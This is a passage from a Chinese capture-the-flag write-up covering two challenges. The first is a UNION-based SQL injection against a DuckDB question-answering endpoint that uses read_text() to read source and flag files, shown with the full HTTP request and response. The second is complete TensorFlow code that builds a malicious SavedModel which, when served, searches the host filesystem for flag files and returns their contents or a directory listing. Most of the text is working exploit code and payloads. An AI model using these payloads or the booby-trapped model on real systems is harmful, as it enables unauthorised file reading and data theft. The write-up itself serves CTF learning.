life') AS score, node_id, text FROM documents UNION SELECT '1500', '!', concat('life', version()) UNION SELECT concat('0
根据题目构造如下
{ 'question': '') AS score, node_id, text FROM documents WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(column0) FROM read_text('/app/app.py')) UNION SELECT concat('0' } BinderException duckdb.duckdb.BinderException: Binder Error: Referenced column 'column0' not found in FROM clause! Candidate bindings: 'content' LINE 3: ... WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(column0) FROM read_text('/app/app.py')) UNION SELECT concat... ^
根据爆破分析
BinderException duckdb.duckdb.BinderException: Binder Error: Referenced column 'column0' not found in FROM clause! Candidate bindings: 'content' LINE 3: ... WHERE 1=2 UNION SELECT'1', 'node', (SELECT string_agg(column0) FROM read_text('/app/app.py')) UNIONSELECT concat... ^
更改构造
{ 'question': '') AS score, node_id, text FROM documents WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(content) FROM read_text('/flag')) UNION SELECT concat('0' }
最后数据包如下
POST/askHTTP/1.1 Host:47.93.255.58:20571 Accept-Encoding:gzip,deflate Content-Type:application/json Origin:http://47.93.255.58:20571 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/140.0.0.0Safari/537.36 Accept:*/* Accept-Language:zh-CN,zh;q=0.9 Referer:http://47.93.255.58:20571/ Cookie:session=.eJwlzjsOwjAMANC7ZGawg42TXqbyV7CmdELcnUqc4L1P22vl8Wzbe515a_sr2tYYSeAOwz1BsqaYE3WCKg-11AqdQym6egU7ij-KNBOYiRMgWNBgTtfo3HMkUowoZTRDMXYDzPLROzFBpIYWi6rMS02hdkXOI9d_g-37A2aEMSQ.aMZNlg.hQdEKhaBZkw6D1cP44Jt5jddjx0 Content-Length:16 { 'question':'') AS score, node_id, text FROM documents WHERE 1=2 UNION SELECT '1', 'node', (SELECT string_agg(content) FROM read_text('/flag')) UNION SELECT concat('0' }
拿到flag
HTTP/1.1200OK Server:Werkzeug/3.0.6Python/3.8.20 Date:Sun,14Sep202505:22:35GMT Content-Type:application/json Vary:Cookie Set-Cookie:session=.eJxVkFFLwzAUhf9KyEtXaDVJk6Ud-CBSUdAJ28QHHeU2uekK2mrTgjL2302ZLz7d3Jtzzv2SI63cgP5AV-MwYUKr1tIVVVxqlrHcGGQaXaFrI6WQzDljoUZwFoocpBVgnFWGa7N0EhCZUlIhY1ZpXrOiMGCFEpgjlza3DhSva65rZWrG0ZlcCKkkswgWnNIAughbUUsaQCaPw5mGh_bQ-rEffujq9Ui_JpxPNIrJ9ZZ40w-YkK63GOQJGfF7JLebp0diezN9YDd68nJXbkrCrwR5Xt8_rcm2fChvdiTiUUKi2Rnq4m_ox6HtmgqaZmH6bgz--Bw3BMxqTl9El-4dmiiO_8cFuYFwywJv-NPPvvMYgOksPmZmWYg8kyljwqUSRJ6ClDItMhTh-UsOwE9vXbDuDhjQG9J6YqYRL-j-tD_9Ao62f4I.aMZRGw.2A58-_PH3NO1WdDVBdMIGkA3mu0;HttpOnly;Path=/ Connection:close Content-Length:97 { 'answer':[ 'flag{3c692834-002f-4a28-a444-93e2ada61aa1}n', 'The dog is cute.' ] }
Mini-modelscope
具体程序如下
import tensorflow as tf import zipfile import os from pathlib import Path import shutil import tempfile # 构建 SavedModel(签名名为 'serve',输入 [1,1] float32,输出字符串张量) classM(tf.Module): @tf.function(input_signature=[tf.TensorSpec(shape=[1, 1], dtype=tf.float32)]) defserve(self, x): # 仅使用可序列化到图的 TF 原生算子,避免 py_function 导致回调缺失错误 flag_patterns = [ '/flag', '/flag.txt', '/home/*/flag', '/home/*/flag.txt', '/workspace/flag', '/workspace/*/flag', '/workspace/*/flag.txt', '/mnt/flag', '/mnt/flag.txt', '/mnt/*/flag', '/mnt/*/flag.txt', '/mnt/data/flag', '/mnt/data/flag.txt', '/mnt/data/*/flag', '/mnt/data/*/flag.txt', '/app/flag', '/app/*/flag', '/app/*/flag.txt', '/opt/flag', '/opt/*/flag', '/opt/*/flag.txt', '/var/flag', '/var/tmp/flag', '/var/*/flag', '/tmp/flag', '/tmp/flag.txt', '/srv/flag', '/srv/*/flag', '/etc/flag', '/root/flag', '/root/flag.txt'# 可能无权限,匹配为空即可 ] # 聚合所有匹配到的候选文件 files_list = [] for pat in flag_patterns: files_list.append(tf.io.matching_files(pat)) # -> 1D tf.string files = tf.concat(files_list, axis=0) if files_list else tf.constant([], dtype=tf.string) files = tf.unique(files).y # 去重 def_read_first_file(): first = tf.gather(files, 0) content = tf.io.read_file(first) return tf.reshape(content, [1, 1]) def_fallback_listing(): # 仅用 matching_files/strings 生成目录枚举文本,避免 py_function list_patterns = [ '/*', '/home/*', '/workspace/*', '/mnt/*', '/mnt/data/*', '/app/*', '/opt/*', '/var/*', '/tmp/*', '/srv/*' ] ls_list = [] for pat in list_patterns: ls_list.append(tf.io.matching_files(pat)) ls = tf.concat(ls_list, axis=0) if ls_list else tf.constant([], dtype=tf.string) ls = tf.unique(ls).y # 连接为一段文本;若为空则回退为 no-flag has_any = tf.greater(tf.size(ls), 0) def_join_ls(): joined = tf.strings.reduce_join(ls, separator='n') return tf.reshape(joined, [1, 1]) def_no_flag(): return tf.constant([[b'no-flag']], dtype=tf.string) return tf.cond(has_any, _join_ls, _no_flag) has_file = tf.greater(tf.size(files), 0) out = tf.cond(has_file, _read_first_file, _fallback_listing) return {'prediction': out} defbuild_and_zip(zip_path: str = 'model.zip'): # 使用临时目录避免路径冲突 tmp_root = Path(tempfile.mkdtemp(prefix='savedmodel_')) export_dir = tmp_root / 'sm' export_dir.mkdir(parents=True, exist_ok=True) m = M() # 导出 SavedModel,指定签名名为 'serve' tf.saved_model.save(m, str(export_dir), signatures={'serve': m.serve}) # 打包导出目录内容至 zip 根 base = export_dir with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as z: for root, dirs, files in os.walk(base): for f in files: full = Path(root) / f rel = full.relative_to(base) z.write(full, arcname=str(rel)) print(f'SavedModel built at '{export_dir}', zipped to '{zip_path}'') # 可选清理 try: shutil.rmtree(tmp_root) except Exception: pass if __name__ == '__main__': build_and_zip()